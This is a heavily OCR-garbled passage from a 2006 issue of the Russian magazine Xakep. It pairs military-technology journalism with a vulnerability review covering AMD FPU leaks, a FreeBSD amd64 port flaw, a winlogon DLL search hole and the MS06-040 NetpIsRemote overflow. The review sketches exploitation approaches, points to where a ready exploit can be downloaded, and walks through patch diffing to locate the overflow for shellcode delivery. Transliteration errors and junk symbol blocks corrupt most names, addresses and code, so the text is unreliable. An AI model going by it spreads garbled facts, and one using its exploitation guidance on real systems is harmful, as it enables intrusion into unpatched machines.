Стоимость одного выстрела ТНЕЦ учитывающая реактивы и 
энергозатраты — около 3-х тысяч долларов. Это доволь- 
но много, однако мало по сравнению со стоимостью од- 
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ной противовоздушной ракеты. В будущем 
ЫоіІІтгор Ѳпіттап будет выпускать подобные 
Зкудиагб, разработанные для разных приме- 
нений: мобильных, стационарных и «встроен- 
ных в военную технику» . 

□ Ыехі-Сеп оружие 

Пока мы говорили о «новичках» на поле боя, у 
тебя может создаться впечатление, что тради- 
ционные танки и самолеты уже изжили сами 
себя как оружие. Но это не так. Не стоит за- 
бывать, что все, что хорошо работает, можно 
конструктивно улучшить. Это и собираются 
сделать крупнейшие мировые поставщики 
военной техники. Если навести Іті-іесіт маки- 



Разнообразие 

«кубиков» поражает: тут тебе и тягач, и сани- 
тарная машина, и бронетранспортер для 12 
пехотинцев, и ракетная пусковая ус- 
тановка с вертикальным стартом 
ракет. Но и это еще не все. ЗЕР 
может превратиться в команд- 
ный пункт, машину разминиро- 
вания, радар, разведывательную 
машину, машину для химичес- 
кого и радиационного анализа и 
обеззараживания, центр связи, 
машину для радиоэлектронной 
борьбы и самоходный миномет. 

Вся прелесть ЗЕР состоит в 
том, что стандартные «мо- 
дули миссии» могут быть 
заменены уже после выхо- 
да машины с конвейера, 
фактически в полевыхусло- 
виях. Поэтому генералы могут маневрировать 
своими возможностями, превращая вчераш- 
ние разведывательные броневики в противо- 
танковые установки, а завтра — в машины для 
системы ПВО. 

Все модули имеют стандартизированные разъ- 
емы и замки, соединяющие их с шасси, кото- 
рое может быть колесным (полноприводным, 
с формулой 6x6 или 8x8) или гусеничным. 
Внутри базовых шасси также велика унифи- 
кация узлов. И здесь ключевую роль играет 
выбранная система привода. 

ЗЕР работает исключительно на электромо- 
торном ходу. Они получают питание от мощных 
аккумуляторов, которые подзаряжают дизель- 
генератор. Прямой связи колес и ДВС здесь нет, 
что дало инженерам огромную свободу в ком- 
поновке агрегатов. 

Для большей надежности на ЗЕР стоит сразу 
два дизель-генератора. Их суммарная мощ- 
ность — 100 киловатт. Дизели установлены в 
надгусеничном или надколесном пространс- 
тве (по бортам), что оставляет свободным 
большой объем в центре машины, а также 
дает экипажу дополнительную защиту. А элек- 
тромоторы же встроены в ступицы каждого 
колеса. И, конечно, электрическая трансмис- 
сия, вернее гибридный привод последователь- 



ного типа, дает машине новые возможности. 
Так, в колесном варианте можно управлять 
вращением каждого колеса индивидуально 
и выполнять, скажем, танковый разворот на 
месте. Запас энергии в аккумуляторах поз- 
воляет ЗЕР некоторое время двигаться 
почти беззвучно, не включая дизель, и 
этот режим делает машину малозаметной 
в инфракрасном диапазоне. 

Особое внимание конструкторы уделили 
гусеницам: они резиновые, ленточные (то есть 
неразрывные). Компания пишет, что приме- 



ненные материалы и конструкция обеспечили 
этой резиновой гусенице вдвое больший срок 
службы, чем у гусеницы стальной, при значи- 
тельно меньшем весе и уровне шума. 

Как ты видишь, вооружение медленно, но вер- 
но обрастает новыми свойствами и высокими 
технологиями. Как тебе, например, возмож- 
ность запуска боевого бомбардировщика с 
подводной лодки? Причем последняя нахо- 
дится под водой на глубине 46 метров. Разра- 
боткой этого проекта занимается компания 
І_осІтеесІ Маіііп. Беспилотный бомбардиров- 
щик или разведчик Согтогапі может помес- 
титься в пусковую шахту от ядерной ракеты 
Тгібепі, на борту атомной субмарины класса 
«Огайо». 

Длина этой машины составляет 5,8 метра, 
размах крыльев — 4,86 метра, а вес — чуть 
больше 4-х тонн, из которых примерно 453 ки- 
лограмма приходятся на полезный груз. В ее 
внешнем облике обращает на себя внимание 
треугольный воздухозаборник в носу и сильно 
согнутые крылья чайки. Правда, в отличие от 
межконтинентальных ракет Согтогапі не бу- 
дет выстреливать вверх пороховым зарядом. 
После открытия крышки шахты из нее выдви- 
нется седло, на котором держится самолет. 

По замыслу авторов проекта, аппарат осво- 



Универсальная ма- 
шина смерти 



яж на некоторые виды оружия, то оно может 
прослужить дольше и остаться таким же эф- 
фективным. 

Вот, например, если сделать корпус обычного 
танка из композита с добавкой аморфных «ум- 
ных» наночастиц с определенными свойства- 
ми, то при попадании снаряда поврежденные 
части будут заполняться композитом, делая 
танк снова монолитным. Если же добавить к 
этому массив из наномоторов, переключаю- 
щих по заданной программе микроскопичес- 
кие цветные панели в зависимости от схемы 
маскировки машины, обеспечивая «эффект 
невидимости», то такой танк непросто будет 
увидеть и поразить. 

Но больше всего надежд у военных на так 
называемую модульную военную технику, ко- 
торую можно будет на поле боя перестроить 
во что угодно: начиная от тяжелого танка и 
заканчивая легким беспилотным самолетом- 
разведчиком. Конечно, это «ультимативная 
мечта», для достижения которой ученым и 
инженерам придется еще не один десяток лет 
потрудиться. 

Но конкретные результаты есть уже сегодня. 
Один из них — боевая машина ЗЕР, изготовлен- 
ная дочерним предприятием известнейшей 
военной фирмы ВАЕ Зузіетз — Наддіипбз. 
Идея машины-трансформера проста: стан- 
дартное шасси и набор «кубиков», позволяю- 
щих легким движением руки превращать БТР 
в ракетную пусковую установку или танк. При- 
чем как на колесном, так и на гусеничном ходу. 



/0054 



ХАКЕР 09 /93/ 06 




Л щ/т 

Іміш 

© ©I© 




■Л'' © © © © Ш *©■; ©; 

© © © © © © ". 

і 1 1 © © © © © 

© © © © © т © 



Ш Щ 83 , 83 , 83 , 83 , 83 83 83 , 

43; -3; •>:, ѵ?( *>;- 4*: 

© © © © © © ©; ©; © 

1 1 1 © І' 1 І! 1 1 

© © « шш © © © ѣ 



© 



1- © 



ІРІ Н « Ь № Шт 

© © © © 1 © © 1 © © 1 ©, Ц Ц I 

© © © © © © © © © © © © 

© © © © © © © © © © © 'I 



§> ‘І5ѵ Ш' 'Ш' 

V* • Ѵ~ • V* / VI- / 




© © ш 


© 


©. 


© 


© 


© 


Щ щ 


т 


© 


© 


© 


© 


© 


© 


© 


© © © '© 


© 


© 


© © (Г 1 


© 


© 


© 


© 


© 


€і Ш 


© 1 


т 


© 


© 


© 


© 


© 


© 


© ©*й © 


© 


© 


© © © 


© 


© 


© 


© 


© 


Щ ®. 


©■ 


©' 


'© 


© 


© 


1 


© 


© 


© Р© © 


© 


т 


© ©;@ 


© 


© 


© 


© 


©' 


і§> Щ 


© 


© 


© 


© 


© 


© 


© 


© 


© © 


© 


© 


Шт 


© 


© 


© 


© 


і© 


1 1 


© 


© 


© 


© 


© 


© 


© 


© 








т 8» 8» 










■8а 








© 


© 


© 


© 


© 


© 


























© 


© 


-© 


© 


© 


© 


























© 


© 


© 


© 


© 


© 









бождают, и он свободно всплываетна 
поверхность. Здесь он запускает два 
мощных твердотопливных ускорите- 
ля и вертикально взлетает, включая 
затем свой маршевый турбовентиляторный 
двигатель с тягой 1360 килограммов и пере- 
ходя в горизонтальный полет. Максимальная 
скорость машины должна составлять 880 
километров в час, крейсерская — порядка 
550-ти, а радиус действия — аж до 926 ки- 
лометров. 

Согпгюгапі сможет находиться в воздухе до 3 
часов. И еще его можно будет и оборудовать 
несколькими ракетами для ударов по бере- 
говым целям или «грузовым» контейнером 
для доставки снаряжения спецназовцам, вы- 
брошенным в тылу противника. А там на него 
можно будет и боеприпасы загрузить. 

После выполнения миссии беспилотник ав- 
томатически следует в точку встречи и са- 
дится на воду. Точнее, он просто глушит и за- 
крывает двигатель, плюхается с небольшой 
высоты в волны. Затем аппарат выпускает 
вниз специальную привязь, за которую его 
втягивает в недра лодки робот. 

Пока проект находится в разработке. Сей- 
час ведутся эксперименты по испытанию 
работы турбины под водой. Они должны 
завершиться к сентябрю нынешнего года. 
И если сложностей не возникнет, то проект 
Согтогапі увидит поле боя. 

О Стратегия в реальном времени 

Помнишь игру С&С Оепегаіз? Большинство 
из предсказанного в ней оружия появит- 
ся в строю уже к 2010-2020 году: лазерные 
турели, роботы-дроны и беспилотные раз- 
ведчики. Сам же ход войны тоже потихоньку 
изменяется. Благодаря развитым средствам 
связи и беспилотным машинам штабисты 
стран, у которых больше всего денег, смогут 
лет через тридцать вести войну, как заправс- 
кие геймеры-РТЗ’ники. На долю пехоты оста- 
нется победное шествие по предварительно 
разгромленным роботами городам. Нельзя 
сказать, что это приятная картина, но сам ха- 
рактер войны меняется со временем. Тенденция 
«технологизации» войны была определена с 
появлением дубины, она же и сохранилась по 
сей день. 

Лет через сто, скорее всего, наши потомки бу- 
дут восхищенно смотреть на фотографии тех 
героев, которые заплатили своими жизнями 
за победу. Ну не смотреть же им на фотогра- 
фии сломанных в бою роботов, правда? 
Недавно Пентагон дал добро на строительс- 
тво первых двух экспериментальных эсминцев 




Самолет СІоЬаІ Наѵѵк 



проекта ЭЭХ. Строительство начнется в 2007 
году. Бюджет программы будет представлен 
на утверждение в Конгресс в будущем фев- 
рале. ВМС намеревается получить от пяти до 
восьми кораблей этого класса. Приблизитель- 
ная стоимость первых двух кораблей составит 
3,3 миллиарда долларов за каждый. Однако, 
по оценкам аналитиков, стоимость каждого 
корабля может превысить четыре миллиарда 
долларов. 

Эсминцы проекта ЭЭХ должны стать в буду- 
щем основой военного флота США. Такой 
эсминец будет представлять собой универ- 
сальную платформу, на основе которой при 
помощи модулей можно будет оперативно 
создавать узкоспециальный боевой ко- 
рабль — тральщик, эсминец ПВО, корабль 
поддержки сухопутных операций и даже 
компонент ПРО. 

Беспилотный эсминец можно будет оснас- 
тить даже кинетическим оружием, которое 
позволит вести огонь с высокой скоро- 
стрельностью. 

В космическом агентстве ЫАЗА сейчас идут 
тестирования и испытательные полеты ново- 
го экспериментального беспилотного сверх- 
звуковогосамолетаХ-43А,способноголетать 
со скоростью, в 7 раз превышающей ско- 
рость звука, то есть около 2 км в секунду. Для 
этого на нем установлен воздушно-реактив- 
ный двига- 
тель нового 



Модульная машина 
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поколения. В отличие от ракеты, которая 
«везет» на себе кислород, необходимый 
для работы двигателя, двигатель Х-43А бе- 
рет кислород из атмосферного воздуха, и в 
качестве топлива на борту находится только 
водород. Хотя бы поэтому самолет будет лег- 
че ракеты, но двигаться при этом он будет с 
почти «ракетной» скоростью. Самолет сов- 
сем невелик по размерам: его длина состав- 
ляет приблизительно 3.6 м, размах крыльев 
— 1,5 м, вес — около 1 270 кг. Первый его не- 
пилотируемый полет состоялся на полигоне 
летного исследовательского центра Эгусіеп 
в Калифорнии. Правда, пока двигатель само- 
лета Х-43А может запускаться только после 
того, какего разогнали до довольно большой 
скорости. Поэтому в первых испытательных 
полетах Х-43А будет сначала разгоняться 
ракетой Редазиз, которая стартанет с борта 
бомбардировщика В-52 на высоте около 30 
км над поверхностью океана. После того как 
ракета разогнала Х-43А до скорости в семь 
раз превышающей скорость звука, она отде- 
лилась, и самолет полетел дальше самосто- 
ятельно в соответствии с программой, после 
чего упал вТихий океан. Пока запланировано 
провести еще два испытательных полета X- 
43А, соответственно, изготовлено 3 образ- 
ца самолета. Первые два полета прошли на 
скорости 7 Махов, а вот до запланированной 
10-Маховой скорости самолет так и не доб- 
рался. Но испытания продолжаются! НЕ 
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О Дыра в АМО К7/К8 

ВРІЕГ 

В апреле 2006 года обнаружилась дыра в про- 
цессорах АМО К7/К8, позволяющая одному 
процессору заглянуть внутрь сопроцессор- 
ного контекста другого процесса, что ведет 
к утечке данных и упрощает атаку на крип- 
тографические системы ( ѵѵѵѵѵѵ.зесигіМосиз. 
сот/Ыб/17600 ). Для быстрого переключения 
контекста І_іпих и В80-системы используют 
пару команд іхзаѵе/іхгзіог, сохраняющих/вос- 
станавливающих регистры сопроцессора 
в/из оперативной памяти . Коварство іхгзіог за- 
ключается в том, что она сохраняет указатель 
команд (РІР), указатель данных (Эаіа Роіпіег) 
и опкод последней инструкции только в том 
случае, если бит Е5 (ехсерііоп зиттагу) в ста- 
тусном слове сопроцессора х87 установлен. 
При переключении контекста ось не обнуляет 
эти данные, и они становятся доступны «пос- 
торонним» процессам. 

ТАРСЕТ5 

Строго говоря, это не ошибка, а документи- 
рованная особенность процессоров АМО, на 
которую прежде никто не обращал внимания, 
поскольку с процессорами ІпіеІ в этом плане 
все ОК. Уязвимость затрагивает все І_І[\ІІ)Х- и 
ВЗО-системы, а, возможно, и ѴѴіпбоѵѵз. 

ЕХРЮІТ 

Для реализации атаки ехріоіі'а не требуется — 
достаточно просто выполнять командуіхзаѵе в 
цикле, надеясь поймать что-то интересное. 

ЗОШТЮМ 

Разработчики 1_11\11Х/ВЗЭ уже выпустили патчи 
— зесигіЫосиз.сот/ЫсІ/17600/зоІиІіоп . — очи- 
щающие ЕЗ-бит и загружающие фиктивный 
боиЫе на стек сопроцессора. Вот фрагмент 
заплатки для ВЗЭ: 



зіаііс боиЫе битту = 0.0; 

ПШІШНПІГ^І 

1 

и_збогі зіаіиз;іпзізѵѵ(&зіаіиз); 
іі (зіаіиз&0х80) іпсіех(); 

азт ѵоІаііІе( 

"Ягее %%зі(7);ІІб %0" : : "т" (битту)); } 



> АМО-64 собственной персоной 



О Дыра в АМО х86-64 

ВРІЕГ 

Дагі Кігта — один из разработчиков РгееВЗО 
— обратил внимание, что на АМО х86-64 не- 
привилегированный пользователь может 
получить непосредственный доступ к обору- 
дованию с прикладного уровня. Это объяс- 
няется тем, что х86-64 имеет два механизма 
разделения привилегий. Код, исполняющий 
на уровне ядра, имеет доступ ко всем портам 
ввода/вывода и обычно является «посредни- 
ком» междужелезом и изег-тобе, что не всег- 
да удобно, поэтому процессор поддерживает 
специальную карту, позволяющую «открыть» 
часть портов, разрешив к ним доступ с при- 
кладного уровня. Суть в том, что вплоть до 
РгееВЗЭ/атб64 5.4-ЯЕІ_ЕАЗЕ эта таблица 
инициализировалась неправильно, образуя 
огромную дыру в системе безопасности. Зло- 
умышленник (или некорректно работающий 
код) может вызывать отказ в обслуживании, 
разрушать или похищать информацию. 

ТАРСЕТ5 

Уязвимость затрагивает только операцион- 
ную систему РгееВЗЭ версии 5.4 или ниже, 
работающую на платформе АМЭ х86-64. Ріа 
все остальные системы эта дыра не распро- 
страняется. 

ЕХРЮІТ 

Для реализации данной уязвимости ехріоіі; 
не требуется — достаточно установить обра- 
ботчик исключений и последовательно пе- 
ребрать все порты, определяя, какие из них 
доступны на запись/чтение, а какие — нет. 

ЗОШТІОМ 

Существует несколько решений этой про- 
блемы: например, обновить систему до вер- 
сии 5-ЗТАВІ_Е или наложить заплатку, после 
чего перекомпилировать ядро. 



> Процесс ѵѵіпіодоп.ехе по умолчанию ищет 
динамические библиотеки в домашней дирек- 
тории пользователя 

О Дыра в привилегированном процес- 
се ѵѵіпіодоп.ехе 

ВРІЕГ 

8 августа 2006 года сразу два специалиста 
из І_еѵіаіНап Зесигііу Огоир обратили внима- 
ние на то, что процесс ѵѵіпіодоп.ехе начинает 
поиск динамических библиотек с домашнего 
каталога пользователя и только потом перехо- 
дит к системному каталогу ѴѴіпбоѵѵз, поэтому 
любой пользователь может легко повысить 
свои привилегии до ЗУЗТЕМ, если положит в 
свой домашний каталог «заряженную» ЭІ_І_. 
Удаленная атака легко реализуется через 
зловредную ѵѵеЬ-страничку, запрашивающую 
имя пользователя и пароль. ІЕ их высылает 
автоматически и, если компьютер допускает 
удаленные подключения (что характерно для 
серверов), злоумышленнику достаточно за- 
кинуть ЭІ_І_ в НОМЕ, выйти из системы и вой- 
ти еще раз. Подробности тут: ѵѵѵѵѵѵ.тісгозоіі. 
сотЛесНпе1/5есип1ѵ/ВиІІе1іп/М306-051.тзрх. 

ТАРСЕТЗ 

Уязвимости подвержены: ѴѴіпбоѵѵз 2000, ХР 
ЗР1 , ХР ЗР 2, Зегѵег 2003 и Зегѵег 2003 ЗР1 . 

ЕХРЮІТ 5 

Для реализации данной атаки ехріоіі не тре- 
буется. 

ЗОШТІОМ 

Місгозоіі уже выпустила заплатки для всех 
уязвимых систем, выложив их на боѵѵпіоаб- 
сервер. Если же по каким-то причинам он 
недоступен, то можно воспользоваться 
альтернативным решением, задействовав 
режим безопасного поиска динамических 
библиотек. Для этого необходимо запустить 
редактор реестра (гедебі32.ехе), открыть 
следующую ветвь реестра НКІ_М\ЗѴЗТЕМ\ 
СиггепіСопігоІЗеА СопігоІХЗеззіоп Мападег и 
добавить значение «ЗаіеЭІІЗеагсШобе» типа 
ЭѴѴОРЭ, установленное в 1 , после чего пере- 
загрузить машину. 
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> Блог команды Зесигііу Везропзе Сепіег 



О МісгозоЙ Кетіх, 
или новая дыра в ЯРС 

ВРІЕГ 

За МісгозоЙ уже закрепилась устойчивая 
репутации компании, никогда не исправляю- 
щей крупные ошибки с первого раза. Вот и 
сейчас, когда эпидемия МЗВІ_АЗТ еще свежа 
в памяти (и мутированные черви до сих пор 
бродят по сети), в НРС (Яетоіе Ргосебиге СаІІ 
— Механизм удаленного вызова процедур) 
обнаружилась новая ошибка переполнения, 
допускающая удаленную засылку зИеІІ-кода с 
захватом управления на правах ЗУЗТЕМ. 

Мы не знаем, кто первый обнаружил ошиб- 
ку, но 8 августа 2006 года Американское 
общество 1)3 СЕРТ (ІІпііесІ Зіаіез Сотриіег 



Етегдепсу Реабіпезз Теат) и Калифорнийс- 
кий институт ЗАЫЗ (ЗузАбтіп, Аисііі, Ыеіѵѵогк, 
Зесигііу) практически одновременно высла- 
ли свои раппорты в Місгозоіі. Публичный 
пресс-релиз ( ѵѵѵѵѵѵ■кЬ■се^1■о^а/ѵ^Iз/іб/650769 , ) 
не раскрывал никаких технических деталей, 
но, несмотря на это, 1 0 августа уже появился 
рабочий ехріоіі, являющийся частью проекта 
Меіазріоіі Ргатеѵѵогк: ѵѵѵѵѵѵ.ппе^азріоіі.сопп . 
Місгозоіі присвоила уязвимости критический 
уровень безопасности и в тот же день выпус- 
тила бюллетень М306-040: тісгозоіі.сот/ 
1есІппе1/зесигі1у/Ви1Іе1іп/М306-040 . тзрх . 



ТАРСЕТЗ 

Місгозоіі занесла в список уязвимых систем 
ѴѴіпсІоѵѵз 2000, ХР ЗР1, ХР ЗР2, Зегѵег 2003 
и Зегѵег 2003 ЗР1 , в то время как создатели 
Меіазріоіі Ргатеѵѵогк ехрІоіРа претендовали 
на «поддержку7: ЫТ 4.0, ѴѴіпбоѵѵз 2000 ЗР0- 
ЗР4,ХРЗР0-ЗР1 .подчеркивая, что удаленное 
выполнение зИеІІ-кода на ХР ЗР2/ѴѴіпбоѵѵз 
2003 ЗР1 невозможно, и максимум, что мож- 
но устроить, — это отказ в обслуживании». 
Парни из Місгозоіі Зесигііу Резропзе Сепіег 
ВІод провели свое собственное расследо- 
вание и выяснили, что удаленное выполне- 
ние кода возможно только на ѴѴіпсІоѵѵз 2000 
и ХР ЗР 1 . Им не удалось атаковать ни ХР ЗР 
2, ни Зегѵег 2003, ни Зегѵег 2003 ЗР 1 : Ыоаз. 
ІесИпеІ.сот/тзгс/агсІпіѵе/2006/08/1 1 /44607 
8.азрх (однако следует помнить, что между 
«не удалось атаковать» и «атаковать невоз- 
можно» — огромная разница!). 

ЕХРЮІТ 

Готовый ехріоіі: (написанный на языке РегІ) 
можно свободно скачать по адресам: Іпйр:// 
теІазрІоіЕсот/ргоіес^з/Ггатеѵѵогк/ехрІоі^з. 
Іп1тІ#пе1арі тзОб 040 и ИНр://тіІѵѵ0гт.сот/ 
ехрІоіІз/2162 . 

30ШТІ0М 

МісгозоЙ уже выпустила заплатки для боль- 



> Стартовый экран Меіазріоі* Ргатеѵѵогк 



> Ехріоіі М3 ѴѴіпсІоѵѵз І\ІеірІзВетоіе() Ветоіе ОѵегІІоѵѵ на сайте МіІѵѵОгт 



•] * ц-ти-цы. т-і і 



ТТ 






-рр^- 

пг 



плтт игПрм 




? і-»хИ ? I кос* Ѵо, 

И. 14 4 

Н Ѵни' В Тж/І Ѵй 



}, * 9 * Ъ 414 

■Ъ. І 9 * І 4 14 

Е- гсоН а ' Тз.^ Б В 



— — і[ н^гг^піі ѵіГ.Іі І4Гі «-.рі-іітв - Г'І гі^г.ллі] 



■ СіУЧСІ* і^іи 



&№- І'Р* N1'! 1мЗе> 

_ т *"т; * ас-тк і -ьу; сігкіійгу 
Гт .г л'» глгі*--ч:а 

&№ І'ѵ МІЧ >Ні]^ 

ЦцрІЛѵ я 11 1 р - р і " 1 1 яг Іий еі 

с. .г І'Ч- : т 

В #Л+І г>р!иі Гі ягкі р*^іыік9і 
■ л.-* сяпГЕуигжИгт Е- 

агч -» (у л |ис^*#пг ^»-ІжЕі? 

і'клг а г а. і. ш : р ч.'.и.іі жѵ? рруіи-нія 
■ {ІЛЛкІ рл^-ігплмпіЕ мігііМі 

3»]«І іл «-ЛІсЕі С-і 



■._г ■■< «•>. ,лі ѵЭі.КіЬ 



рг т 

і Нк ЯШІ/2Х/КГ/ЗХЛ 



т, 



/ 058 



ХАКЕР 09 /93/ 06 








Гш Ч Ц- I Г« ^ ГІД- 

€іг ' л стесав» < 



шинства своих систем, доступные через 
службу ѴѴіпсІоѵѵз ІІрсІаіе, однако при желании 
можно обойтись и без них: достаточно забло- 
кировать ЗМВ-трафик из внешней сети, для 
чего необходимо закрыть два ТСР-порта — 
1 39 и 445 (но это сделает работу приложений, 
работающих через 5МВ, невозможной). 

С'ЕТАІІ_5 

Механизм РРС является низкоуровневым 
средством межкомпьютерного взаимодейс- 
твия, предоставляющим прозрачный меха- 
низм удаленного вызова процедур, который, 
сточки зрения прикладной программы, выгля- 
дит так, как будто бы процедура находится на 
локальной машине. На базе РРС построены 
многие системные сервисы и, в частности, 
ЗМВ (Зегѵег Меззаде ВІоск), реализующий 
именованные каналы (патесі рірез) и исполь- 
зующий РРС в качестве транспорта. В свою 
очередь, ЗМВ используется для удаленного 
доступа к файлам, папкам и принтерам. И все 
бы ничего, но в функции І\ІеірІзРетоіе(), сосре- 
доточенной в библиотеке І\ІеіАрі32.0І_І_, допу- 
щена ошибка контроля границ, приводящая к 

> Обольстительно короткая ЫефІзРетоІеО 
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>Тянем заплатку с сервера МісгозоІІ 

традиционному стековому переполнению, с 
возможностью подмены адреса возврата. 
Если бы ЫеірІзРетоіеО была документирован- 
ной функций, то мы бы просто передавали ей 
аргументы различной длины, пытаясь вызвать 
переполнение, но, к сожалению, ее прототип 
неизвестен, а потому приходится прибегать к 
тяжелой артиллерии, то есть к дизассемблиро- 
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ванию. Итак, загружаем библиотеку І\ІеіАрі32. 
ОІ_І_ в ЮА Рго и начинаем исследовать функ- 
цию ЫеірІзРетоіеО, пытаясь «глазами» найти 
место, в котором происходит переполнение, в 
первую очередь, обращая внимания на циклы, 
копирующиеблокипамяти(типатоѵесх,[еах]/ 
тоѵ [еЬх],еах/абб еах,4) или вызовы функций 
тетсруО, теттоѵе(), зІгсру(), \д/сзсру() и т.д. 
Функция І\ІеірІзРетоіе() выглядит обманчиво 
маленькой, но, если присмотреться повнима- 
тельнее, можно обнаружить множество ус- 
ловных переходов, ведущих на СШЫК'и (то 
есть на ее продолжение), совокупный объем 
которых довольно велик и затруднителен для 
анализа. 

Беглый поиск обнаруживает пару подозри- 
тельных функций ѵѵсзсруО и \А/сзсаі(), однако 
ѵѵсзсруО отпадает сразу, поскольку копирует 
строку фиксированной длины, жестко проши- 
тую внутри І\Іе1Арі32.0І_І_, а\л/сзсаі() восходит 
к функции І_І\Іе 1 І\ІатеСапопісаІІ 2 е(), перспек- 
тивы переполнения которой на данном этапе 
исследований весьматуманны и неясны. 

Дизассемблерный фрагмент 
Ые1рІ$Кето1е() с потенциально опас- 
ными функциями ѵѵсзсруО и ѵѵс$саі() 
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> ВЕМАРІС.С — основной источник информации по 8МВ-командам 



>СгеаІеРгоІосоІ() на МЗЭЫ 
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азе 7С017СР4 


ризб 


[еЬр+агд_С] 


саІІ 


бз: іітю ѵѵсзсоѵ 


рор есх 


ризб 


еЬх 


ризб 


[еЬр+агд_С] 



сіз: ітс 



Но ведь в нашем распоряжении есть готовая 
заплатка! Давай, чтобы не блуждать впотьмах, 
просто сравним дизассемблерные листинги 
функции ЫеІрІзРетоІеО до и после обновле- 
ния — все изменения станут сразу очевидны! 



Скачиваем заплатку с официального серве- 
ра Місгозоіі (для моей ѴѴіпбоѵѵз 2000 ЗР4 это 
боѵѵпІоасІ.тісгозоІІсот/боѵѵпІоасІ/ЭЮббЗІЗ- 
87б0-445сІ-8а41-б2ІІеІ9а40Ьа/\л/іпсІоѵѵз2000- 
кЬ921 883-х86-гиз.ехе ). представляющую со- 
бой обыкновенный самораспаковывающийся 
саЬ-архив. В прошлом ревью мы показыва- 
ли, как извлечь его содержимое с помощью 
біеѵѵ'а, однако есть и более короткий путь: 
достаточно «скормить» исполняемый файл 
гаг'у — и все упакованные файлы предстанут 
перед нашими глазами! 

Извлекаем из архива І\ІеіАрі32.0І_І_, переиме- 
новываем ее, например, в І\ІеіАрі32-пеѵѵ.ОІ_І_и 
загружаем в дизассемблер. Какие различия 
между старой и новой версией І\ІеірІзВепло{е() 
мы увидим? В первую очередь, это гнусная 
выходка компилятора, инвертировавшего 



Старая (слева) и новая (справа) версии МеірІзНето1е() 



7С025С2С тоѵ еах, [еЬр+агд_4] 

7С025С2Р ризб бѵѵогсі ріг [еах+4] 

7С025С32 ризбебі 

7С025СЗЗ саІІ І_МеіІ\ІатеСапопісаІІ 2 е 

7С025С38 стр [еЬр+ѵаг_4],ебі 

7С025СЗВ }7- Іос_7С025С48 

7С025С30 тоѵ еах, [еЬр+агд_С] 

7С025С40 Іеа еЬх, [еЬр+ѵаг_20С] 

7С025С46 ]тр Іос_7С025С60 

7С025С60 Іос_7С025С60: 

7С025С60 тоѵ есх, [еЬр+агд_8] 

7С025С63 пед еах 

7С025С65 зЬЬ еах, еах 

7С025С67 стр [еЬр+агд_С],ебі 

7С025С6А тоѵ [есх], еах 

7С025С6С Іос_7С025С8А 



7С025С6Е 

7С025С73 



ризб азс_7С017СР4 
ризб [еЬр+агд_С] 



7С023180 тоѵ еах,[еЬр+агд_0] 

7С0231 90 ризб сіѵѵогсі ріг [еах+4] 

7С023193 ризбебі 

7С023194 саІІ І_І\ІеіІ\ІатеСапопісаІІ 2 

7С023199 стр [еЬр+ѵаг_4],ебі 

7С02319С \г Іос_7С0231А9 

7С02319Е тоѵ еах, [еЬр+агд_8] 

7С0231А1 Іеа еЬх, [еЬр+ѵаг_20С] 

7С0231А7 ]тр Іос_7С0231С1 

7С0231С1 Іос_7С0231С1: 

7С0231С1 тоѵ есх, [еЬр+агд_4] 

7С0231С4 пед еах 

7С0231С6 зЬЬеах, еах 

7С0231С8 стр [еЬр+агд_8],ебі 

7С0231СВ тоѵ [есх], еах 

7С0231С0 Іос_7С023208 

7С0231СР ризбеЬх 

7СО23Ю0 саіісіз: ітр_ѵѵсзІеп 

7С023Ю6 абсі еах, 3 

7С023Ю9 рор есх 

7С023ЮА стр [еЬр+агд_С], еах 

7С0231 00 іпЬ збогі Іос_7С0231 ЕС 

7С0231 ЕС Іос_7С0231 ЕС: 

7С0231 ЕС ризб азс_7С01 1 744 

7С0231Р1 ризб [еЬр+агд_8] 



условные переходы, в результате чего ветви 
программы поменялись местами: 



Л\І2 Ьгапсб_А 



Ц2 Ьгапсб_В 



Ьгеапсб_В 

Ьгеапсб_А 

Листинг Функции ЫефІзРетоіе() иденти- 
чен в обоих версиях, но порядок машин- 
ных команд поменялся местами, ослепляя 
большинство анализаторов типа іс.ехе и 
ѵѵпіпсІіТТ, которыми мы пользовались ранее. 
Как же быть? А вот как! Берем блок А из 
старой версии І\Іе1Арі32.0І_І_ и ищем похо- 
жий на него блок в [\Іе{Арі32-пе\л/.ОІ_І_, затем 
добиваемся, чтобы первые строки блока в 
обоих окнах дизассемблера совпадали (что 
легко осуществляется мышью или курсор- 
ными клавишами). Теперь начинаем быстро 
переключаться с одного окна дизассемб- 
лера на другое по <АІ_Т ТАВ>, при этом не- 
совпадающие строки начинают интенсивно 
мерцать, выдавая различия с головой (ана- 
логичным образом астрономы ищут и новые 
звезды — то есть звезды, меняющий свой 
блеск, — попеременно проецируя на экран 
несколько слайдов, снятых в разное время. 
Они смотрят, не начнет ли какая точка рит- 
мично мигать. Способ древний, как мамонт, 
но очень надежный. 

Действуя таким образом, мы довольно быстро 
найдем «длинную» функцию \д/сзІеп(), которой 
не было ранее и которая контролирует длину 
строки перед копированием (см. врезку). 

Ага! Вот оно! Между функциями 1_Ые!Ыате- 
СапопісаІі^еО и \л/сзсру()/ѵѵсзса{() в обнов- 
ленной версии ЫеіАрі32.0І_І_ внедрен вызов 
ѵѵсзІеп(), проверяющий размер строки, воз- 
ращенный І_[\Іеі[\ІатеСапопісаІІ 2 е() перед 
его копированием в блок памяти, передан- 
ный по указателю через аргумент функции 
(агд_С — в старой и агд_8 — в новой версии). 
Сама же І_МеіІ\ІатеСапопісаІІ 2 е() также 
«принимает на грудь» указатель извлекае- 
мой структуры, переданной Ые!р1зВето!е() в 
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качестве аргумента. 

Все это создает крайне благоприятные 
условия для реализации атаки и засыл- 
ки зНеІІ-кода. Достаточно всего лишь пе- 
редать слишком длинную строку функци 
І_І\ІеіМатеСапопісаІІ 2 е() вместе с указателем 
на крошечный буфер, неспособный вмес- 
тить «канонизированное» имя. Локальный 
ехріоіі пишется без проблем, ведь функция 
МеірІзВетоіе() экспортируется, и все, что нам 
нужно, — это восстановить его прототип. 
Однако локальный ехріоіі — не слишком-то 
полезная штука, гораздо больший интерес 
вызывают удаленные ехріоіі'ы. Можем ли мы 
использовать эту уязвимость для атаки, и 
если да, то как? 

Переходим в начало функции І\ІеІрІзРетоІе() 
и, нажав <АІ_Т-Ѵ> [ѵіеѵѵ], <0> [ореп зиЬ- 
ѵіеѵѵ], <0> [сгозз геіегепсез], смотрим по 
перекрестным ссылкам, какие функции 
ее вызывают. Большинство функций се- 
мейства І_*() доступны через 8МВ Ретоіе 
АРІз, то есть их можно вызывать удаленно 
по РРС-протоколу, инкапсулированному в 
8МВ. Подробнее об этом можно прочитать на 
форуме іттипііузес'а в сообщении извес- 
